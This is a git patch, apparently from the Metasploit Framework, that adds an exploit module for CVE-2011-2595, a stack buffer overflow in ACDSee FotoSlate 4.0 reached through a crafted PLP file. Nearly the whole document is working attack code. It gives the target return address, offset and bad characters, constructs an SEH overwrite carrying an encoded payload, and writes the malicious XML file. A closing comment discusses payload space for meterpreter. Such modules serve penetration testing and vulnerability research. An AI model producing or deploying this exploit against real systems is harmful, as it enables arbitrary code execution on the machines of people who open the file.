From 8488343e46ea2496f8fe425b6b13a1a1cbaa5fbb Mon Sep 17 00:00:00 2001
From: Wei Chen <Wei_Chen@rapid7.com>
Date: Mon, 10 Oct 2011 16:11:05 +0000
Subject: [PATCH] Add CVE-2011-2595 (Feature #5645)

git-svn-id: file:///home/svn/framework3/trunk@13852 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../fileformat/acdsee_fotoslate_string.rb     | 184 ++++++++++++++++++
 1 file changed, 184 insertions(+)
 create mode 100644 modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb

diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb
new file mode 100644
index 0000000000..f21c1d6b1b
--- /dev/null
+++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb
@@ -0,0 +1,184 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::FILEFORMAT
+	include Msf::Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'ACDSee FotoSlate PLP File id Parameter Overflow',
+			'Description'    => %q{
+					This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
+				a specially crafted id parameter in a String element.  When viewing a malicious
+				PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
+				buffer and execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Parvez Anwar', # Vulnerability discovery
+					'juan vazquez'  # Metasploit module
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2011-2595' ],
+					[ 'OSVDB', '75425' ],
+					[ 'BID', '49558' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'DisablePayloadHandler' => 'true'
+				},
+			'Payload'        =>
+				{
+					#'Space'    => 4000,
+					'BadChars' => "\x00\x22"
+				},
+			'Platform' => 'win',
+			'Targets'        =>
+				[
+					[
+						'ACDSee FotoSlate 4.0 Build 146 / Windows XP SP3 English',
+						{
+							'Ret'         => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
+							'Offset'      => 1812,
+							'TotalLength' => 5000
+						}
+					],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Sep 12 2011',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The file name.',  'msf.plp']),
+			], self.class)
+	end
+
+	def exploit
+
+		overflow = rand_text(target["Offset"])
+		overflow << generate_seh_record(target.ret)
+		overflow << payload.encoded
+		overflow << rand_text_alpha(target["TotalLength"] - overflow.length)
+
+		plp =<<TEMPLATE
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<ACDFotoSlateDocument15>
+<PageDefinition>
+<Template>
+<Version>3.0</Version>
+<Page>
+<Name>Letter</Name>
+<Properties>
+<String id="#{overflow}"></String>
+<String id="Width">8.500000IN</String>
+<String id="Height">11.000000IN</String>
+<String id="Orientation">Portrait</String>
+<Bool id="AutoRotate">FALSE</Bool>
+<Bool id="AutoFill">FALSE</Bool>
+</Properties>
+<Content>
+<Bool id="UseBGColor">FALSE</Bool>
+<Int id="BGImageType">0</Int>
+<String id="BGImageFile"></String>
+<Int id="BGColor">16777215</Int>
+</Content>
+</Page>
+<ToolList>
+<Group>
+<Tool>
+<Name>Image</Name>
+<Properties>
+<String id="XPos">0.500000IN</String>
+<String id="YPos">0.500000IN</String>
+<String id="Width">7.500000IN</String>
+<String id="Height">10.000000IN</String>
+<Float id="Tilt">0.000000</Float>
+</Properties>
+<Content>
+<Int id="ShapeType">0</Int>
+<Float id="RoundRectX">0.000000</Float>
+<Float id="RoundRectY">0.000000</Float>
+<Bool id="ShrinkToFit">FALSE</Bool>
+<Bool id="AutoRotate">FALSE</Bool>
+<Float id="BorderWidth">0.000000</Float>
+<Bool id="UseBGColor">FALSE</Bool>
+<Int id="BGColor">8454143</Int>
+<Bool id="DropShadow">FALSE</Bool>
+<Int id="DSColor">0</Int>
+<Bool id="BevelEdge">FALSE</Bool>
+<Bool id="Border">FALSE</Bool>
+<Int id="BorderColor">16711680</Int>
+<Bool id="IsLocked">FALSE</Bool>
+</Content>
+</Tool>
+</Group>
+</ToolList>
+</Template>
+<PageContent>
+<Version>3.0</Version>
+<Page>
+<Name>Letter</Name>
+<Content>
+<Bool id="UseBGColor">FALSE</Bool>
+<Int id="BGImageType">0</Int>
+<String id="BGImageFile"></String>
+<Int id="BGColor">16777215</Int>
+</Content>
+</Page>
+<ToolList>
+<Group>
+<Tool>
+<Name>Image</Name>
+<Content>
+<Int id="ShapeType">0</Int>
+<Float id="RoundRectX">0.000000</Float>
+<Float id="RoundRectY">0.000000</Float>
+<Bool id="ShrinkToFit">FALSE</Bool>
+<Bool id="AutoRotate">FALSE</Bool>
+<Float id="BorderWidth">0.000000</Float>
+<Bool id="UseBGColor">FALSE</Bool>
+<Int id="BGColor">8454143</Int>
+<Bool id="DropShadow">FALSE</Bool>
+<Int id="DSColor">0</Int>
+<Bool id="BevelEdge">FALSE</Bool>
+<Bool id="Border">FALSE</Bool>
+<Int id="BorderColor">16711680</Int>
+<Bool id="IsLocked">FALSE</Bool>
+</Content>
+</Tool>
+</Group>
+</ToolList>
+</PageContent>
+</PageDefinition>
+</ACDFotoSlateDocument15>
+TEMPLATE
+
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+		file_create(plp)
+	end
+
+end
+
+
+=begin
+After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid
+using a long buffer in order to avoid the meterpreter possibly being broken.
+=end